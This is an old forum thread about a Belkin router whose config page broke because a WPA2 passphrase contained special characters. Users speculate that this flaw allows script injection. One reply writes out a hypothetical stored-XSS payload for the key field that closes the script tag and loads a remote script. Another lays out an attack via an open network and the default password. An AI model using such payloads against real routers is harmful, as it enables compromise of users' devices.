Sparda Posted January 25, 2007 Share Posted January 25, 2007 ok, so this is my fun story :D I was setting up my new wireless AP (Belkin some thing other other) and for the sake of lazyness I grabbed my WPA2 PSK from http://grc.com/passwords.htm and used the full ASCII range. Now, it worked fine I could connect to it and all that, but when I went back to security configuration page the page refused to load. So I looked at the source code a bit, and came to the conclusion that the PSK I had used was been interpreted by the browser as part of the JavaScript of the page and was causing the page to not load. I didn't go this far, but, because, the browser was trying to run my PSK as JavaScript, it instantly jumped in to my mind that some one could use this to put malitius code on peoples routers configuration web pages. To make it clear, I haven't figured out how my PSK broke the JavaScript. Never the less, this made me realise that it should be easy for some one to insert a iframe on to some ones router config page (and perhaps still hve it continue to work). Even though I'm a pretty internet savy guy (as you all probably know ;)), I would always trust the scripting on my router config pages and wouldn't think twice about open the router config in IE if that was my only available option. So, basically, what COULD happen is this: Malitius person injects JavaScript on to router config page (by connecting on to open wifi and using default password). Actual user realises they can't connect to there wifi because suddenly it's asking or a password. They, probably, call more tech savy person who realises that the PSK got changed. Tech savy person wires in to the router, visits the router config page in IE (since that's all that's likely to be available). IE renders page with embeded iFrame and the box get OWNED! Time for a formating of the HD with ext3. Thoughts? Quote Link to comment Share on other sites More sharing options...
melodic Posted January 25, 2007 Share Posted January 25, 2007 Thoughts? ...get a job. Quote Link to comment Share on other sites More sharing options...
Sparda Posted January 25, 2007 Author Share Posted January 25, 2007 I have a job, and that's sitting while been a posting god Quote Link to comment Share on other sites More sharing options...
VaKo Posted January 25, 2007 Share Posted January 25, 2007 Thats nothing, our internal ticketing system for call tracking will process any php/html/javascript code you paste into it... Quote Link to comment Share on other sites More sharing options...
Sparda Posted January 25, 2007 Author Share Posted January 25, 2007 Thats nothing, our internal ticketing system for call tracking will process any php/html/javascript code you paste into it... ouch... please tell me that isn't remotely accessible... Quote Link to comment Share on other sites More sharing options...
VaKo Posted January 25, 2007 Share Posted January 25, 2007 Nah... internal only. Still makes night shifts fun though. Quote Link to comment Share on other sites More sharing options...
killzone Posted January 25, 2007 Share Posted January 25, 2007 do you think this is a one time fluke or that it is a problem inherent to belkin wifi products>? And are you planning on do a proof of concept anytime soon>? Quote Link to comment Share on other sites More sharing options...
Sparda Posted January 26, 2007 Author Share Posted January 26, 2007 do you think this is a one time fluke or that it is a problem inherent to belkin wifi products>?And are you planning on do a proof of concept anytime soon>? I would say that it will be a problem with any Belkin routers that use this particular web interface. I have the FSD7231-4, I haven't worked out which character caused the page to brake (with 255 possible characters that would be kind of difficult to do in a non-scripting way). However, in practicality, once you have escaped the text box (it might be a a couple of characters of course, not just 1), you still have (at most) 62 characters with which to place your own JavaScript. This weekend I will do some digging around in to this and see if I can't place a iFrame on my own routers config page, or at least have it display a fun popup. Quote Link to comment Share on other sites More sharing options...
psychoaliendog Posted January 26, 2007 Share Posted January 26, 2007 Hmmm... Javascript you say? Here's a possible scenario, your router is probably doing a some sort of server side scripting. It then generates the page which happens to contain a javascript something like: var key = "[your key]"; the problem is that you key could contain a quote, it could be a single or double quote, as javascript uses both for strings. for instance: var key = "my"lame"key"; now what you have to do is add a </script>after the quote, and link to an external script. so your key could be: "</script><script src="http://hak5.org/a.js"></script> But this is hypothetical, seeing I don't have the source or the key, but a quick run to grc's password page reveals that those passwords are chock full of quotes and other things that could get you in trouble. But if you care to post your key and the source of that page, I will be glad to install spyware on you computer... I mean... ummm... goodbye... Quote Link to comment Share on other sites More sharing options...
Sparda Posted January 26, 2007 Author Share Posted January 26, 2007 Ye lol, that's probably what's happening. I would give you the key, but in my haste to try and get it working (as in, able to change the PSK) it completely went out of my mind to save it for further analysis. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.